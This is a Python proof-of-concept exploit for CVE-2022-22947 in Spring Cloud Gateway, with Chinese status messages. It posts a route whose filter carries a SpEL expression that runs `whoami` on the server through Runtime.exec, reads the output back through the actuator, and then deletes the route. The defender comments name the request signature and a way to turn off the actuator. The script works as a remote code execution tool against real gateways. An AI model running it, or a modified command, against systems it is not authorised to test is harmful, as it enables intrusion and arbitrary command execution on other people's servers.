import requests
import urllib3
import json
import re
import sys
# Silence urllib3's warnings. Every request in this script is sent with
# verify=False, so the target's TLS certificate is never validated and urllib3
# would otherwise print a warning for each call.
urllib3.disable_warnings()

# Banner printed once at start-up; it names the CVE this script checks for.
a = (
    '\n'
    'CVE-2022-22947_POC  CVE-2022-22947_POC  CVE-2022-22947_POC\n'
    'CVE-2022-22947_POC  CVE-2022-22947_POC  CVE-2022-22947_POC\n'
)

# Spring Cloud Gateway actuator paths. The last segment of uri_check ("code")
# is the same route id that the payload below carries in its "id" field.
_GATEWAY_ACTUATOR = '/actuator/gateway'
uri_check = _GATEWAY_ACTUATOR + '/routes/code'
uri_refresh = _GATEWAY_ACTUATOR + '/refresh'

# Header fields shared by both request types; only Content-Type differs.
_COMMON_HEADERS = {
    'Accept-Encoding': 'gzip, deflate',
    'Accept': '*/*',
    'Accept-Language': 'en',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
}

# Headers for the route-creation request (JSON body).
headers_add = {**_COMMON_HEADERS, 'Content-Type': 'application/json'}

# Headers for the refresh request (no body is sent with it).
headers_refresh = {
    **_COMMON_HEADERS,
    'Content-Type': 'application/x-www-form-urlencoded',
}

# Filter argument: a "#{...}" SpEL template that runs `whoami` on the gateway
# host and returns its output as the value of the added response header.
# For defenders: a route-creation request whose filter args contain "#{" is the
# observable signature of this check. Where the gateway actuator is not
# needed, it can be switched off with management.endpoint.gateway.enabled=false.
_SPEL_PROBE = (
    '#{new java.lang.String(T(org.springframework.util.StreamUtils)'
    '.copyToByteArray(T(java.lang.Runtime).getRuntime()'
    '.exec(new String[]{"whoami"}).getInputStream()))}'
)

# Route definition sent to the gateway; the shape follows y4er's write-up.
payload = {
    "id": "code",
    "filters": [
        {
            "name": "AddResponseHeader",
            "args": {
                "value": _SPEL_PROBE,
                "name": "cmd123",
            },
        },
    ],
    "uri": "http://aaa.com",
    "order": 0,
}

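# Inject the route
def zhuru(url):
    """Create the probe route on the gateway and print the HTTP outcome.

    POSTs the module-level ``payload`` as JSON to ``url + uri_check`` with TLS
    verification disabled and a 2 second timeout, then prints one status line
    (plus the status code when the request is rejected).

    Args:
        url: Base URL of the gateway. It is concatenated directly with
            ``uri_check``, so a trailing slash produces a double slash.

    Returns:
        None. All results are printed.
    """
    try:
        target = url + uri_check
        # ``data`` already carries the serialized body. The earlier version also
        # passed ``json=json`` (the json *module*); requests ignores ``json``
        # when ``data`` is set, so the argument is dropped.
        resp = requests.post(
            url=target,
            headers=headers_add,
            data=json.dumps(payload, ensure_ascii=False),
            verify=False,
            timeout=2,
        )
        status = resp.status_code
        if status in (200, 201):
            # Acceptance only shows the actuator endpoint is reachable and
            # writable. Whether the expression is evaluated is decided by the
            # read-back step, so no verdict is printed here (a patched gateway
            # may still accept the route definition).
            print('[+]注入路由成功,是否存在漏洞以回显结果为准')
        else:
            # A rejection (authentication, a different actuator base path, a
            # filtering proxy) says nothing about the gateway version, so it is
            # reported as inconclusive rather than "not vulnerable".
            print('[-]注入路由失败，无法确认漏洞是否存在')
            print(status)
    except requests.exceptions.Timeout:
        print('[-]注入路由超时,漏洞检测超时')
    except requests.exceptions.RequestException:
        # Connection refused, TLS failure, malformed URL: not a timeout.
        print('[-]注入路由请求失败')
    except Exception:
        # Exception rather than a bare except, so Ctrl-C and SystemExit
        # are not swallowed.
        print('[-]注入路由异常')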

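# Refresh the routes
def refresh(url):
    """Ask the gateway to reload its route table and print the outcome.

    POSTs to ``url + uri_refresh`` with ``headers_refresh``, TLS verification
    disabled and a 1 second timeout. Only HTTP 200 is reported as success.

    Args:
        url: Base URL of the gateway, concatenated directly with
            ``uri_refresh``.

    Returns:
        None. All results are printed.
    """
    try:
        resp = requests.post(
            url=url + uri_refresh,
            headers=headers_refresh,
            verify=False,
            timeout=1,
        )
        if resp.status_code == 200:
            print('[+]刷新路由成功')
        else:
            print('[-]刷新路由失败')
    except requests.exceptions.Timeout:
        print('[-]刷新路由超时')
    except requests.exceptions.RequestException:
        # Connection refused, TLS failure, malformed URL: not a timeout.
        print('[-]刷新路由请求失败')
    except Exception:
        # Exception rather than a bare except, so Ctrl-C and SystemExit
        # are not swallowed.
        print('[-]刷新路由异常')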
 
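# Read back the result
def huixian(url):
    """Fetch the probe route and print the evaluated filter value, if any.

    GETs ``url + uri_check`` (1 second timeout, TLS verification disabled),
    strips single quotes, spaces and literal ``\\n`` sequences from the body,
    and looks for ``AddResponseHeaderResult=<value>],``. A match means the
    gateway returned a value in that position; this is the step that actually
    confirms the finding.

    Args:
        url: Base URL of the gateway, concatenated directly with ``uri_check``.

    Returns:
        None. All results are printed.
    """
    try:
        resp = requests.get(
            url=url + uri_check,
            headers=headers_add,
            verify=False,
            timeout=1,
        )
        if resp.status_code != 200:
            print('[-]获取回显失败，请手动测试')
            return

        # Note: stripping spaces also removes spaces inside the echoed value.
        body = resp.text.replace("'", '').replace(" ", '').replace("\\n", '')

        # The flag belongs to the pattern. The earlier code passed re.S as the
        # second argument of a compiled pattern's findall(), where it is the
        # start *position* (16), so DOTALL was never applied and the first 16
        # characters of the body were skipped.
        found = re.search(r'AddResponseHeaderResult=(.*?)],', body, re.S)
        if found is None:
            # HTTP 200 without an evaluated result: report it explicitly
            # instead of relying on an IndexError reaching the catch-all.
            print('[-]获取回显失败，请手动测试')
            return

        huixian = found.group(1)
        print(f'[+]获取回显命令成功：{huixian}')
    except requests.exceptions.Timeout:
        print('[-]获取回显超时')
    except requests.exceptions.RequestException:
        # Connection refused, TLS failure, malformed URL: not a timeout.
        print('[-]获取回显请求失败')
    except Exception:
        # Exception rather than a bare except, so Ctrl-C and SystemExit
        # are not swallowed.
        print('[-]获取回显异常，请手动测试')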

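# Delete the injected route
def del_rce_in(url):
    """Remove the probe route from the gateway and print the outcome.

    Sends DELETE to ``url + uri_check`` with TLS verification disabled and a
    2 second timeout. Only HTTP 200 is reported as success. Any other result
    means the route definition may still be present on the target and has to
    be removed by hand.

    Args:
        url: Base URL of the gateway, concatenated directly with ``uri_check``.

    Returns:
        None. All results are printed.
    """
    try:
        # Renamed from ``all``, which shadowed the builtin. The concatenation
        # now sits inside the try so a non-string ``url`` is reported like
        # every other failure instead of raising.
        route_url = url + uri_check
        resp = requests.delete(url=route_url, verify=False, timeout=2)
        if resp.status_code == 200:
            print('[+]删除注入路由成功')
        else:
            print('[-]删除注入路由失败')
    except requests.exceptions.Timeout:
        print('[-]删除注入路由超时')
    except requests.exceptions.RequestException:
        # Connection refused, TLS failure, malformed URL: not a timeout.
        print('[-]删除注入路由请求失败')
    except Exception:
        # Exception rather than a bare except, so Ctrl-C and SystemExit
        # are not swallowed.
        print('[-]删除注入路由异常')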

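# Run the full check
def poc(url):
    """Run the check end to end: add route, refresh, read back, clean up.

    The route removal and the second refresh run in a ``finally`` block, so
    they are still attempted when an earlier step raises or the run is
    interrupted. Otherwise the probe route could stay behind on the target.

    Args:
        url: Base URL of the gateway, passed unchanged to every step.

    Returns:
        None. Each step prints its own result.
    """
    try:
        zhuru(url)
        refresh(url)
        huixian(url)
    finally:
        # Always try to leave the target as it was found: remove the route,
        # then refresh so the removal takes effect.
        del_rce_in(url)
        refresh(url)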

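if __name__ == '__main__':
    print(a)
    # Exit with a usage line instead of an IndexError traceback when the
    # target argument is missing.
    if len(sys.argv) < 2:
        sys.exit(f'usage: {sys.argv[0]} <base-url>')
    # Every step appends a path that starts with "/", so trailing slashes on
    # the base URL are dropped to avoid "//actuator/..." requests.
    url = sys.argv[1].rstrip('/')
    poc(url)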
